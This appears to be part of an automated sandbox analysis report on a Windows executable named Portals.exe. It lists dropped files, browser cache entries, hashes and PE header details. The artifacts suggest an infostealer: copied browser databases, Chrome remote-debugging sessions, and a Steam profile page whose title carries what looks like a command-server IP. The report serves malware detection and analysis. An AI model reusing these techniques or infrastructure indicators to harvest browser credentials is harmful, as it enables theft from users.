                                                                                                                                                                                                    SHA-512:DCDD722C3A8AD79265616ADDDCA208E068E4ECEBE8820E4ED16B1D1E07FD52EB3A59A22988450071CFDA50BBFF7CB005ADF05A843DA38421F28572F3433C0F19
                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                    Preview:SQLite format 3......@ ..........................................................................j......z<.{...{.{a{.z.z<z.............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                    C:\ProgramData\i58ym\xt00zm7q1

                                                                                                                                                                                                    Download File
                                                                                                                                                                                                    Process:C:\Users\user\Desktop\Portals.exe
                                                                                                                                                                                                    File Type:SQLite 3.x database, last written using SQLite version 3046000, page size 2048, file counter 2, database pages 20, cookie 0xc, schema 4, UTF-8, version-valid-for 2
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):40960
                                                                                                                                                                                                    Entropy (8bit):0.8616778647394084
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:48:pMtA+IIkCVEq8Ma0D0HOlf/6ykwpLf/UUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:pOCCn8MouB6w9f/MiZqmvJKLPeymwil
                                                                                                                                                                                                    MD5:BDDE4AD11E732420E7ABCCA946B11611
                                                                                                                                                                                                    SHA1:278C3386A37BAFCA507CF4C128600B01B312DDA0
                                                                                                                                                                                                    SHA-256:099AB6B902097361832FC2485E96C71C827E722FA74C09C7D08DCE9091094C1D
                                                                                                                                                                                                    SHA-512:B29061A507FCAE2CB56155C5C911706E60C798D288968B210A1670C0F0D1D3F7B3B2B2919B946FED47C4975B157A56B557F71AE80A427C85C660F6B37153C9E8
                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                    Preview:SQLite format 3......@ ..........................................................................zp....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                    C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\json[1].json

                                                                                                                                                                                                    Download File
                                                                                                                                                                                                    Process:C:\Users\user\Desktop\Portals.exe
                                                                                                                                                                                                    File Type:JSON data
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):1787
                                                                                                                                                                                                    Entropy (8bit):5.385372129843516
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:48:SfNaoClTECdfNaoCm+sNCmtfNaoCNCRkFfNaoCA0UrU0U8Cu:6NnClTECJNnCm+sNCmZNnCNCRkNnCA0o
                                                                                                                                                                                                    MD5:B8DE1BDE8CCE844C63FD31B4A444C259
                                                                                                                                                                                                    SHA1:F4F8DE0171E22D40D093CAAACA53A82EFF8192C2
                                                                                                                                                                                                    SHA-256:E1FCA036C4D5D972F843D748765AC8E57290B4F487DE7264E03FB0F19F154530
                                                                                                                                                                                                    SHA-512:3F105A3414DE79443FC503F8F845F7E25C1BBABBB433995D0A4B639E689066BFB47CD1E18993988AB867BF0C4ED83E457DE1F3C10AA0481EF3F0FCBC12A31E50
                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                    Preview:[ {.. "description": "",.. "devtoolsFrontendUrl": "/devtools/inspector.html?ws=localhost:9223/devtools/page/C8FC7FE0F51CC3F7E4C8D4C5173A879D",.. "id": "C8FC7FE0F51CC3F7E4C8D4C5173A879D",.. "title": "Google Network Speech",.. "type": "background_page",.. "url": "chrome-extension://neajdppkdcdipfabeoofebfddakdcjhd/_generated_background_page.html",.. "webSocketDebuggerUrl": "ws://localhost:9223/devtools/page/C8FC7FE0F51CC3F7E4C8D4C5173A879D"..}, {.. "description": "",.. "devtoolsFrontendUrl": "/devtools/inspector.html?ws=localhost:9223/devtools/page/1BC2CFD138A014F6872AA767559C44DA",.. "id": "1BC2CFD138A014F6872AA767559C44DA",.. "title": "Google Hangouts",.. "type": "background_page",.. "url": "chrome-extension://nkeimhogjdpnpccoofpliimaahmaaome/background.html",.. "webSocketDebuggerUrl": "ws://localhost:9223/devtools/page/1BC2CFD138A014F6872AA767559C44DA"..}, {.. "description": "",.. "devtoolsFrontendUrl": "/devtools/inspector.html?ws=localhost:9223/devtoo

                                                                                                                                                                                                    C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\76561199829660832[1].htm

                                                                                                                                                                                                    Download File
                                                                                                                                                                                                    Process:C:\Users\user\Desktop\Portals.exe
                                                                                                                                                                                                    File Type:HTML document, Unicode text, UTF-8 text, with very long lines (3184)
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):38102
                                                                                                                                                                                                    Entropy (8bit):5.3696999450357135
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:768:oBpq1J9cOGMnevx83TfwtH7NS3FQaXfsW9l+X9hJYFnzOMD5QBdxaXfsW9l+X9h8:oB81JKOGMnevx83TfwtH78QaXfsW9l+C
                                                                                                                                                                                                    MD5:BCD6589662948950AF3409CB30357451
                                                                                                                                                                                                    SHA1:36C7639E3909C467902838B6BFF22C1B6CDB0D29
                                                                                                                                                                                                    SHA-256:E1E69C211344BEB8FE27990BFD95C98BA63548F5617AD864094E2F3ACD1C1077
                                                                                                                                                                                                    SHA-512:91C6A92AE600242FD086329E6DAF151AFBC1E0E2EEE97BC5877A08667277576DA18EDC2BE400B3133BD6A3922981C2735AEDC253BF51CBC6C2AAE4BB2477661D
                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                    Preview:<!DOCTYPE html>.<html class=" responsive DesktopUI" lang="en">.<head>..<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">....<meta name="viewport" content="width=device-width,initial-scale=1">...<meta name="theme-color" content="#171a21">...<title>Steam Community :: ir7am https://116.202.4.223|</title>..<link rel="shortcut icon" href="/favicon.ico" type="image/x-icon">.......<link href="https://community.fastly.steamstatic.com/public/shared/css/motiva_sans.css?v=-yZgCk0Nu7kH&amp;l=english&amp;_cdn=fastly" rel="stylesheet" type="text/css">.<link href="https://community.fastly.steamstatic.com/public/shared/css/buttons.css?v=qhQgyjWi6LgJ&amp;l=english&amp;_cdn=fastly" rel="stylesheet" type="text/css">.<link href="https://community.fastly.steamstatic.com/public/shared/css/shared_global.css?v=Eq36AUaEgab8&amp;l=english&amp;_cdn=fastly" rel="stylesheet" type="text/css">.<link href="https://community.fastly.steamstatic.com/public/css/globalv2.css?v=GlKQ1cghJWE2&amp;l=english&

                                                                                                                                                                                                    C:\Windows\appcompat\Programs\Amcache.hve

                                                                                                                                                                                                    Download File
                                                                                                                                                                                                    Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                    File Type:MS Windows registry file, NT/2000 or above
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):1835008
                                                                                                                                                                                                    Entropy (8bit):4.470263865321763
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:6144:w+Xfpi67eLPU9skLmb0b4wWSPKaJG8nAgejZQqZaKWFIeC/F1cXIdW1qaEGlVz:vXD94wWlLZQqYgtW4sV
                                                                                                                                                                                                    MD5:6A011EF042D5F895818E94F81BA90522
                                                                                                                                                                                                    SHA1:D627AD0698BAC2DC9749F6BB22C3D4BFB012E77B
                                                                                                                                                                                                    SHA-256:35CD19D5874FB458D19CF9CAF31CEDFC072C00782B931148C8902E35D21174AD
                                                                                                                                                                                                    SHA-512:9AF20BFA05CBF62A78547143E82E8B7D3B411C9FADEB15A916996DC2ED33AC1B18E710E9825299FCC10D21F9CF259AA2444D1D40917541086CE95704E3674F1E
                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                    Preview:regf:...:....\.Z.................... ...........\.A.p.p.C.o.m.p.a.t.\.P.r.o.g.r.a.m.s.\.A.m.c.a.c.h.e...h.v.e....c...b...#.......c...b...#...........c...b...#......rmtm..7wK...............................................................................................................................................................................................................................................................................................................................................{@!C........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                    C:\Windows\appcompat\Programs\Amcache.hve.LOG1

                                                                                                                                                                                                    Download File
                                                                                                                                                                                                    Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                    File Type:MS Windows registry file, NT/2000 or above
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):36864
                                                                                                                                                                                                    Entropy (8bit):4.155339475366137
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:768:SovDoFV/Nr0WFRs4iWgFf8LEl999d9l+9uPIEcfmsc7tV/:So2Fdv+8IlH9l0utcm
                                                                                                                                                                                                    MD5:F337F1668D1D28A41F965AEC7BD211AF
                                                                                                                                                                                                    SHA1:46623546C97412FC5F00A7524E7D8895D414895D
                                                                                                                                                                                                    SHA-256:640CDC68E77F824F2FA451AC9812936022707ED15F889EF2D082FEFEE21D0625
                                                                                                                                                                                                    SHA-512:C3A69FE9C5846F675F7E70290931F3E1395035FC93C1447FD5286F7C35DBED69C8BCF2264945C01DC1B0A214ADB734C2E5EA71FF5B26D9912B82E55AD2579755
                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                    Preview:regf9...9....\.Z.................... ...........\.A.p.p.C.o.m.p.a.t.\.P.r.o.g.r.a.m.s.\.A.m.c.a.c.h.e...h.v.e....c...b...#.......c...b...#...........c...b...#......rmtm..7wK...............................................................................................................................................................................................................................................................................................................................................}@!CHvLE........9............r....n.V................................. .......0..hbin.................\.Z............nk,..\.Z........P...........h...................................<.......&...{11517B7C-E79D-4e20-961B-75A811715ADD}..`...sk..........c...........\...l.............H.........?...................?...................?........... ... ........... ... ...................$.N..........vk..4...`...........CreatingCommand.....O.n.e.D.r.i.v.e.S.e.t.u.p...e.x.e. ./.s.i.l.e.n.t...

                                                                                                                                                                                                    Chrome Cache Entry: 77

                                                                                                                                                                                                    Download File
                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                    File Type:ASCII text, with very long lines (5162), with no line terminators
                                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                                    Size (bytes):5162
                                                                                                                                                                                                    Entropy (8bit):5.349865760247148
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:96:mtOTUb1db1ClNY5co7shdiUYVqig7O7aZCUgpgXEt94k+g8IHh8u928DoCLQ:mtOT8TfL1Vqig7mIg8IB8u88DA
                                                                                                                                                                                                    MD5:70A8F21806E7F1B739937970EBE49A0C
                                                                                                                                                                                                    SHA1:6BE9EEBCE438DE91FEB20E6A5458774B327AA9B4
                                                                                                                                                                                                    SHA-256:C8B531CFD6E9BE13762E289820F67406331303CD5111A885DE959BF83DD0F5AC
                                                                                                                                                                                                    SHA-512:3C055567D0ED53BD30773C0BE475DC7499E44AFB92FB05021029D9A0C1299A470CDD3A8CACCCF798D5345ED627C5836E9DF5955A120FE56BA3624EC76A673270
                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                    URL:"https://www.gstatic.com/og/_/ss/k=og.qtm.sDa5bc0wD58.L.W.O/m=qmd,qcwid/excm=qaaw,qabr,qadd,qaid,qalo,qebr,qein,qhaw,qhawgm3,qhba,qhbr,qhbrgm3,qhch,qhchgm3,qhga,qhid,qhidgm3,qhin,qhlo,qhlogm3,qhmn,qhpc,qhsf,qhsfgm3,qhtt/d=1/ed=1/ct=zgms/rs=AA2YrTucClwlLUqaQmlTybxGncrc_XS2Pg"
                                                                                                                                                                                                    Preview:.gb_Q{-webkit-border-radius:50%;border-radius:50%;bottom:2px;height:18px;position:absolute;right:0;width:18px}.gb_Ka{-webkit-border-radius:50%;border-radius:50%;-webkit-box-shadow:0px 1px 2px 0px rgba(60,64,67,.30),0px 1px 3px 1px rgba(60,64,67,.15);box-shadow:0px 1px 2px 0px rgba(60,64,67,.30),0px 1px 3px 1px rgba(60,64,67,.15);margin:2px}.gb_La{fill:#f9ab00}.gb_H .gb_La{fill:#fdd663}.gb_Ma>.gb_La{fill:#d93025}.gb_H .gb_Ma>.gb_La{fill:#f28b82}.gb_Ma>.gb_Na{fill:white}.gb_Na,.gb_H .gb_Ma>.gb_Na{fill:#202124}.gb_Oa{-webkit-clip-path:path("M16 0C24.8366 0 32 7.16344 32 16C32 16.4964 31.9774 16.9875 31.9332 17.4723C30.5166 16.5411 28.8215 16 27 16C22.0294 16 18 20.0294 18 25C18 27.4671 18.9927 29.7024 20.6004 31.3282C19.1443 31.7653 17.5996 32 16 32C7.16344 32 0 24.8366 0 16C0 7.16344 7.16344 0 16 0Z");clip-path:path("M16 0C24.8366 0 32 7.16344 32 16C32 16.4964 31.9774 16.9875 31.9332 17.4723C30.5166 16.5411 28.8215 16 27 16C22.0294 16 18 20.0294 18 25C18 27.4671 18.9927 29.7024 20.6004 3

                                                                                                                                                                                                    Chrome Cache Entry: 78

                                                                                                                                                                                                    Download File
                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                                    Size (bytes):29
                                                                                                                                                                                                    Entropy (8bit):3.9353986674667634
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:3:VQAOx/1n:VQAOd1n
                                                                                                                                                                                                    MD5:6FED308183D5DFC421602548615204AF
                                                                                                                                                                                                    SHA1:0A3F484AAA41A60970BA92A9AC13523A1D79B4D5
                                                                                                                                                                                                    SHA-256:4B8288C468BCFFF9B23B2A5FF38B58087CD8A6263315899DD3E249A3F7D4AB2D
                                                                                                                                                                                                    SHA-512:A2F7627379F24FEC8DC2C472A9200F6736147172D36A77D71C7C1916C0F8BDD843E36E70D43B5DC5FAABAE8FDD01DD088D389D8AE56ED1F591101F09135D02F5
                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                    URL:https://www.google.com/async/newtab_promos
                                                                                                                                                                                                    Preview:)]}'.{"update":{"promos":{}}}

                                                                                                                                                                                                    Chrome Cache Entry: 79

                                                                                                                                                                                                    Download File
                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                    File Type:ASCII text, with very long lines (65531)
                                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                                    Size (bytes):131642
                                                                                                                                                                                                    Entropy (8bit):5.437794454004125
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:3072:M+rkDj4BST/k4ZYSTVcxhN/aZI4RpTh6z6x0zW:j8jLT/k4ZYSTVcxhN/aZI4RpTh46AW
                                                                                                                                                                                                    MD5:FD6AC3BE6A8BE15DC46D644EE768B29C
                                                                                                                                                                                                    SHA1:A4953C790F5F86960167B0C5D284BD5840D489C1
                                                                                                                                                                                                    SHA-256:71EAA5615041B15831FABF707F61E9EA2F4FA5FEC977A5A3985AD82F666B6D09
                                                                                                                                                                                                    SHA-512:6F8BAEB5EDCF3EA7E96FAA2ABD01EF854866C5273607518A3DAA303953AD17AB2E2B7A53D6D86174844D7C7205137161A5FEC56F7061B3F234B69C9353A5DA82
                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                    URL:https://www.google.com/async/newtab_ogb?hl=en-US&async=fixed:0
                                                                                                                                                                                                    Preview:)]}'.{"update":{"language_code":"en-US","ogb":{"html":{"private_do_not_access_or_else_safe_html_wrapped_value":"\u003cheader class\u003d\"gb_Fa gb_2d gb_Pe gb_rd\" id\u003d\"gb\" role\u003d\"banner\" style\u003d\"background-color:transparent\"\u003e\u003cdiv class\u003d\"gb_Qd\"\u003e\u003c\/div\u003e\u003cdiv class\u003d\"gb_ld gb_pd gb_Hd gb_md\"\u003e\u003cdiv class\u003d\"gb_xd gb_sd\"\u003e\u003cdiv class\u003d\"gb_Kc gb_R\" aria-expanded\u003d\"false\" aria-label\u003d\"Main menu\" role\u003d\"button\" tabindex\u003d\"0\"\u003e\u003csvg focusable\u003d\"false\" viewbox\u003d\"0 0 24 24\"\u003e\u003cpath d\u003d\"M3 18h18v-2H3v2zm0-5h18v-2H3v2zm0-7v2h18V6H3z\"\u003e\u003c\/path\u003e\u003c\/svg\u003e\u003c\/div\u003e\u003cdiv class\u003d\"gb_Kc gb_Nc gb_R\" aria-label\u003d\"Go back\" title\u003d\"Go back\" role\u003d\"button\" tabindex\u003d\"0\"\u003e\u003csvg focusable\u003d\"false\" viewbox\u003d\"0 0 24 24\"\u003e\u003cpath d\u003d\"M20 11H7.83l5.59-5.59L12 4l-8 8 8 8 1.41-1.

                                                                                                                                                                                                    Chrome Cache Entry: 80

                                                                                                                                                                                                    Download File
                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                    File Type:SVG Scalable Vector Graphics image
                                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                                    Size (bytes):1660
                                                                                                                                                                                                    Entropy (8bit):4.301517070642596
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:48:A/S9VU5IDhYYmMqPLmumtrYW2DyZ/jTq9J:A2VUSDhYYmM5trYFw/jmD
                                                                                                                                                                                                    MD5:554640F465EB3ED903B543DAE0A1BCAC
                                                                                                                                                                                                    SHA1:E0E6E2C8939008217EB76A3B3282CA75F3DC401A
                                                                                                                                                                                                    SHA-256:99BF4AA403643A6D41C028E5DB29C79C17CBC815B3E10CD5C6B8F90567A03E52
                                                                                                                                                                                                    SHA-512:462198E2B69F72F1DC9743D0EA5EED7974A035F24600AA1C2DE0211D978FF0795370560CBF274CCC82C8AC97DC3706C753168D4B90B0B81AE84CC922C055CFF0
                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                    URL:https://www.gstatic.com/images/branding/googlelogo/svg/googlelogo_clr_74x24px.svg
                                                                                                                                                                                                    Preview:<svg xmlns="http://www.w3.org/2000/svg" width="74" height="24" viewBox="0 0 74 24"><path fill="#4285F4" d="M9.24 8.19v2.46h5.88c-.18 1.38-.64 2.39-1.34 3.1-.86.86-2.2 1.8-4.54 1.8-3.62 0-6.45-2.92-6.45-6.54s2.83-6.54 6.45-6.54c1.95 0 3.38.77 4.43 1.76L15.4 2.5C13.94 1.08 11.98 0 9.24 0 4.28 0 .11 4.04.11 9s4.17 9 9.13 9c2.68 0 4.7-.88 6.28-2.52 1.62-1.62 2.13-3.91 2.13-5.75 0-.57-.04-1.1-.13-1.54H9.24z"/><path fill="#EA4335" d="M25 6.19c-3.21 0-5.83 2.44-5.83 5.81 0 3.34 2.62 5.81 5.83 5.81s5.83-2.46 5.83-5.81c0-3.37-2.62-5.81-5.83-5.81zm0 9.33c-1.76 0-3.28-1.45-3.28-3.52 0-2.09 1.52-3.52 3.28-3.52s3.28 1.43 3.28 3.52c0 2.07-1.52 3.52-3.28 3.52z"/><path fill="#4285F4" d="M53.58 7.49h-.09c-.57-.68-1.67-1.3-3.06-1.3C47.53 6.19 45 8.72 45 12c0 3.26 2.53 5.81 5.43 5.81 1.39 0 2.49-.62 3.06-1.32h.09v.81c0 2.22-1.19 3.41-3.1 3.41-1.56 0-2.53-1.12-2.93-2.07l-2.22.92c.64 1.54 2.33 3.43 5.15 3.43 2.99 0 5.52-1.76 5.52-6.05V6.49h-2.42v1zm-2.93 8.03c-1.76 0-3.1-1.5-3.1-3.52 0-2.05 1.34-3.52 3.1-3

                                                                                                                                                                                                    Chrome Cache Entry: 81

                                                                                                                                                                                                    Download File
                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                    File Type:ASCII text, with very long lines (898)
                                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                                    Size (bytes):903
                                                                                                                                                                                                    Entropy (8bit):5.183004797075505
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:24:T64+2g8UABHslgT1d1uawBATbCuoBN2t2t2t2t2t2t2tomffffffo:TXUAKlgJXwBASuSNYYYYYYYomffffffo
                                                                                                                                                                                                    MD5:C6CEFFCAFD42A13B3C13E75B8B816401
                                                                                                                                                                                                    SHA1:E858D98F80843F9C89831DBE994ED70D63E593F2
                                                                                                                                                                                                    SHA-256:81630AFFA6CE15EE15698142EF97D434F2782F2D9315D93F1818F5CC24CD23C7
                                                                                                                                                                                                    SHA-512:0C2BB340BE99E3E67BA6DCFD03D90692A13DFA89509AFBF1E97690206DCF60DDD41559C8DE36C23F80302DA543B976B4796223FC24DD1DCC31D5BC8ADFFBD006
                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                    URL:https://www.google.com/complete/search?client=chrome-omni&gs_ri=chrome-ext-ansg&xssi=t&q=&oit=0&oft=1&pgcl=20&gs_rn=42&sugkey=AIzaSyA2KlwBX3mkFo30om9LUFYQhpqLoa_BNhE
                                                                                                                                                                                                    Preview:)]}'.["",["the rookie nathan fillion","sudiksha konanki missing punta cana","blood moon total lunar eclipse tonight","lottery mega millions powerball jackpot","palworld crossplay update","weather storms and tornadoes","wordle today march 13","data breach settlement"],["","","","","","","",""],[],{"google:clientdata":{"bpc":false,"tlw":false},"google:groupsinfo":"ChoIkk4SFQoRVHJlbmRpbmcgc2VhcmNoZXMoCg\u003d\u003d","google:suggestdetail":[{"zl":10002},{"zl":10002},{"zl":10002},{"zl":10002},{"zl":10002},{"zl":10002},{"zl":10002},{"zl":10002}],"google:suggesteventid":"9170889482647092044","google:suggestrelevance":[1257,1256,1255,1254,1253,1252,1251,1250],"google:suggestsubtypes":[[3,143,362,308],[3,143,362,308],[3,143,362,308],[3,143,362,308],[3,143,362,308],[3,143,362,308],[3,143,362,308],[3,143,362,308]],"google:suggesttype":["QUERY","QUERY","QUERY","QUERY","QUERY","QUERY","QUERY","QUERY"]}]

                                                                                                                                                                                                    Static File Info

                                                                                                                                                                                                    General

                                                                                                                                                                                                    File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                    Entropy (8bit):7.9531171337918085
                                                                                                                                                                                                    TrID:
                                                                                                                                                                                                    • Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                                                                                                                                                                                                    • Win32 Executable (generic) a (10002005/4) 49.78%
                                                                                                                                                                                                    • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                                                                                                                                                                                    • Win16/32 Executable Delphi generic (2074/23) 0.01%
                                                                                                                                                                                                    • Generic Win/DOS Executable (2004/3) 0.01%
                                                                                                                                                                                                    File name:Portals.exe
                                                                                                                                                                                                    File size:152'576 bytes
                                                                                                                                                                                                    MD5:1f2c4ac075b7a79917c290f0b9fd27b6
                                                                                                                                                                                                    SHA1:26b2d2ed94bea477e82f1dfe490aff259824ac5d
                                                                                                                                                                                                    SHA256:7b7f4f1480f606b0e49ade273dd67ff9a636c428319fe074f9d98d0f76612728
                                                                                                                                                                                                    SHA512:4ada5989c043b25d7f97077e4ac6b47ecf3a1f7db69b9b6359990454146446f28f5b779354d97fad1bd2b5454538347e082a6e089cd4e5a0fc4e32f8ce8c0842
                                                                                                                                                                                                    SSDEEP:3072:b3GqXhaXFCV70nVvzvgQMjTjm5qCxBfSIEt/4EIOxhy/fFqBO0A3UQ6oaJ:Jx6Fw70VvzgQMjTj0xB2ZnaFkgGJ
                                                                                                                                                                                                    TLSH:42E31254EEF2D6B6F06D0E3A19FB8DC97651F2613889713E41CFA3022AAA1EC1567740
                                                                                                                                                                                                    File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....Q............"...0.."..........f;... ...`....@.. ....................................`................................

                                                                                                                                                                                                    File Icon

                                                                                                                                                                                                    Icon Hash:90cececece8e8eb0

                                                                                                                                                                                                    Static PE Info

                                                                                                                                                                                                    General

                                                                                                                                                                                                    Entrypoint:0x403b66
                                                                                                                                                                                                    Entrypoint Section:.text
                                                                                                                                                                                                    Digitally signed:false
                                                                                                                                                                                                    Imagebase:0x400000
                                                                                                                                                                                                    Subsystem:windows gui
                                                                                                                                                                                                    Image File Characteristics:EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE
                                                                                                                                                                                                    DLL Characteristics:HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                                                                                                                                                                    Time Stamp:0xADFF511F [Mon Jul 3 22:20:15 2062 UTC]
                                                                                                                                                                                                    TLS Callbacks:
                                                                                                                                                                                                    CLR (.Net) Version:
                                                                                                                                                                                                    OS Version Major:4
                                                                                                                                                                                                    OS Version Minor:0
                                                                                                                                                                                                    File Version Major:4
                                                                                                                                                                                                    File Version Minor:0
                                                                                                                                                                                                    Subsystem Version Major:4
                                                                                                                                                                                                    Subsystem Version Minor:0
                                                                                                                                                                                                    Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744

                                                                                                                                                                                                    Entrypoint Preview

                                                                                                                                                                                                    Instruction
                                                                                                                                                                                                    jmp dword ptr [00402000h]
                                                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                                                    push es
                                                                                                                                                                                                    js 00007F2894E842ADh
                                                                                                                                                                                                    or al, 24h
                                                                                                                                                                                                    add eax, 15110704h
                                                                                                                                                                                                    or al, byte ptr [eax]
                                                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                                                    pop esp
                                                                                                                                                                                                    jns 00004273h
                                                                                                                                                                                                    jno 00007F2894E8435Ah
                                                                                                                                                                                                    aam C8h
                                                                                                                                                                                                    outsd
                                                                                                                                                                                                    and eax, 4C604532h
                                                                                                                                                                                                    jmp far 5164h : 62FDD060h
                                                                                                                                                                                                    mov dword ptr [esi], ebx
                                                                                                                                                                                                    xor byte ptr [ebx+7BBFA4B8h], ah
                                                                                                                                                                                                    aam 4Ah
                                                                                                                                                                                                    ret
                                                                                                                                                                                                    jnbe 00007F2894E84316h
                                                                                                                                                                                                    add al, 3Dh
                                                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                                                    jns 00007F2894E84342h
                                                                                                                                                                                                    lea edx, dword ptr [eax]
                                                                                                                                                                                                    loope 00007F2894E842DBh
                                                                                                                                                                                                    sti
                                                                                                                                                                                                    jne 00007F2894E842F3h
                                                                                                                                                                                                    or esp, dword ptr [ecx]
                                                                                                                                                                                                    adc esi, ebp
                                                                                                                                                                                                    cmpsd
                                                                                                                                                                                                    in al, 03h
                                                                                                                                                                                                    mov bh, A3h
                                                                                                                                                                                                    cmpsb
                                                                                                                                                                                                    and dword ptr [eax], esp
                                                                                                                                                                                                    test esi, esp
                                                                                                                                                                                                    cwde
                                                                                                                                                                                                    push edx
                                                                                                                                                                                                    jmp 00007F28431583F1h
                                                                                                                                                                                                    sub dword ptr [edx+325E6BADh], esp
                                                                                                                                                                                                    adc dword ptr [ebx], esp
                                                                                                                                                                                                    lodsd
                                                                                                                                                                                                    rcl dword ptr [eax-35h], FFFFFFDCh
                                                                                                                                                                                                    sub ah, byte ptr [ebx]
                                                                                                                                                                                                    inc ebx
                                                                                                                                                                                                    jnc 00007F2894E8432Bh
                                                                                                                                                                                                    jbe 00007F2894E84357h
                                                                                                                                                                                                    cmp dword ptr [ebp-00874B27h], esi
                                                                                                                                                                                                    push eax
                                                                                                                                                                                                    and ah, byte ptr [ecx+03FCEF36h]
                                                                                                                                                                                                    hlt
                                                                                                                                                                                                    xchg eax, edi
                                                                                                                                                                                                    int3
                                                                                                                                                                                                    scasb
                                                                                                                                                                                                    add eax, A99A6234h
                                                                                                                                                                                                    aam 6Fh
                                                                                                                                                                                                    mov edx, 0A561172h
                                                                                                                                                                                                    mov al, C7h
                                                                                                                                                                                                    pop ds
                                                                                                                                                                                                    cmp esp, ebx
                                                                                                                                                                                                    fdivr qword ptr [edi]
                                                                                                                                                                                                    or bl, byte ptr [ebp-5Eh]
                                                                                                                                                                                                    shl al, FFFFFFBFh
                                                                                                                                                                                                    mov eax, 926A3B5Eh
                                                                                                                                                                                                    add byte ptr [ecx], 00000069h
                                                                                                                                                                                                    pop eax
                                                                                                                                                                                                    stosb

                                                                                                                                                                                                    Data Directories

                                                                                                                                                                                                    NameVirtual AddressVirtual Size Is in Section
                                                                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_IMPORT0x3b140x4f.text
                                                                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_RESOURCE0x60000x59c.rsrc
                                                                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_BASERELOC0x80000xc.reloc
                                                                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_DEBUG0x3a800x38.text
                                                                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_IAT0x20000x8.text
                                                                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x20080x48.text
